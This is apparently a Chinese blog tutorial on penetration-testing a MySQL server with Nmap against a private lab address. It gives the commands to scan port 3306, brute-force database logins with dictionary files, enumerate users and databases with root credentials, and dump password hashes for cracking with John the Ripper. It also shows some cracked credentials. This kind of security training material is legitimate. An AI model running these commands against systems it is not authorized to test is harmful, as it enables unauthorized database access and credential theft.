利用 Nmap 进行 MySQL 渗透测试 通过 Nmap 工具,我们能够对 MySQL 数据库进行渗透测试,从而收集目标数据库的关键信息,包括数据库名称、表、用户名和密码等。本文将指导您进行这一过程。
🐶端口扫描 首先,我们利用 Nmap 对目标进行端口扫描,确认是否开放了 MySQL 的默认端口 3306。
nmap -T4 -A -sT 192.168.5.38
如上图所示,我们发现目标主机开放了 80、8080 和 3306 等端口,而 3306 端口正是 MySQL 数据库的端口。
🌶️检索 MySQL 信息 通过以下命令,我们可以查看目标 MySQL 数据库的版本、协议等相关信息。
nmap --script=mysql-info 192.168.5.38
如上图所示,目标数据库运行的是 MySQL 版本 5.7.26。
💋暴力破解账号 是的,Nmap 还具备暴力破解功能。执行下面的命令可以尝试破解当前数据库的账号和密码。
nmap -p3306 --script=mysql-brute --script-args userdb=/root/user.txt,passdb=/root/pass.txt 192.168.5.38
参数说明:
userdb
:用户名字典passdb
:密码字典
破解效果如下:
通过这一步,我们获得了两个数据库的用户名和密码:lnds:123456@@
、wp:123456@@
。现在,我们可以利用这些信息尝试登录数据库。
mysql -h 192.168.5.38 -u wp -p
当然,如果您有幸破解了 root 账号的密码,您还可以执行以下两个有趣的命令:
🧸列举其他用户名
nmap -p3306 192.168.5.38 --script=mysql-users --script-args mysqluser=root,mysqlpass=toor
🎊列举其他数据库
nmap -p3306 192.168.5.38 --script=mysql-databases --script-args mysqluser=root,mysqlpass=toor
🇨🇳检索哈希
nmap -p3306 192.168.5.38 --script=mysql-dump-hashes --script-args username=root,password=toor
通过这条命令,我们可以列出数据库中其他用户的哈希值,然后利用工具如 John the Ripper 进行哈希破解,从而获取其他用户的密码。
🦞总结 Nmap 对 MySQL 的渗透测试可见效果显著。然而,需要注意的是,任何工具都有其局限性。正如本文所述,对数据库进行渗透测试需要开启 3306 端口且允许所有人登录,并且需要使用强大的密码字典。
暂无评论内容